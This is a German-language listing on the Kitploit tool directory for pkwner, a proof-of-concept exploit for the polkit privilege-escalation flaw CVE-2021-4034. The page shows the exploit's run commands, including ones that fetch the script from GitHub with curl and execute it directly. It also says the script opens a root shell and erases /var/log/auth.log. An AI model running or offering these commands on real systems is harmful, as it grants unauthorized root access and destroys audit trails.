Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
pkwner — Ein Python3- und Bash-PoC für CVE-2021-4034 von Kim Schulz | Kitploit
Tools/GitHubGitHub/kimusan/pkwner
Privilege EscalationSchwachstellenanalyseExploitationPost-ExploitationPenetrationstestsRed Teaming
GitHubkimusan/pkwner

pkwner

Ein Python3- und Bash-PoC für CVE-2021-4034 von Kim Schulz

Repository anzeigen
2376vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
root@kitploit:~
██████╗ ██╗  ██╗██╗    ██╗███╗   ██╗███████╗██████╗ 
██╔══██╗██║ ██╔╝██║    ██║████╗  ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗  ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝  ██╔══██╗
██║     ██║  ██╗╚███╔███╔╝██║ ╚████║███████╗██║  ██║
╚═╝     ╚═╝  ╚═╝ ╚══╝╚══╝ ╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝
Ein Python3- und ein BASH-PoC für CVE-2021-4034 von Kim Schulz

Einleitung

Dies ist ein einfacher PoC für den neu entdeckten Polkit-Fehler namens PwnKit.

Ich habe ihn sowohl als Bash- als auch als Python3-Skript erstellt – einfach aus Spaß an der Freude.

Das Problem ist sehr einfach auszunutzen, hat aber enorme Konsequenzen, da es auf den meisten Linux-Rechnern, auf denen der Angreifer lokalen Benutzerzugriff hat, problemlos Root-Zugriff gewährt.

So führen Sie es aus

Diese Skripte sind für die einmalige Ausführung gedacht, führen Sie also einfach Folgendes aus:

root@kitploit:~
python3 pkwner.py

oder

root@kitploit:~
bash pkwner.sh

Sie können es auch direkt von einem Webserver (z. B. diesem GitHub-Repository) ausführen über:

root@kitploit:~
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)

oder

root@kitploit:~
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))

In beiden Fällen sollte es ungefähr so aussehen: alt text und alt text

Das Skript erstellt einige Dateien und Ordner, räumt aber nach sich selbst auf, sobald die Root-Shell geöffnet ist – es bereinigt sogar die /var/log/auth.log (warum auch nicht).

Danksagungen

  • Qualys für das Finden des Problems und die Veröffentlichung der Informationen
  • Andris Raugulis für einen der ersten PoCs, von dem ich mich inspirieren ließ
  • MiscGang, weil misgang@Kalmarunionen verdammt stark sind
Tool herunterladen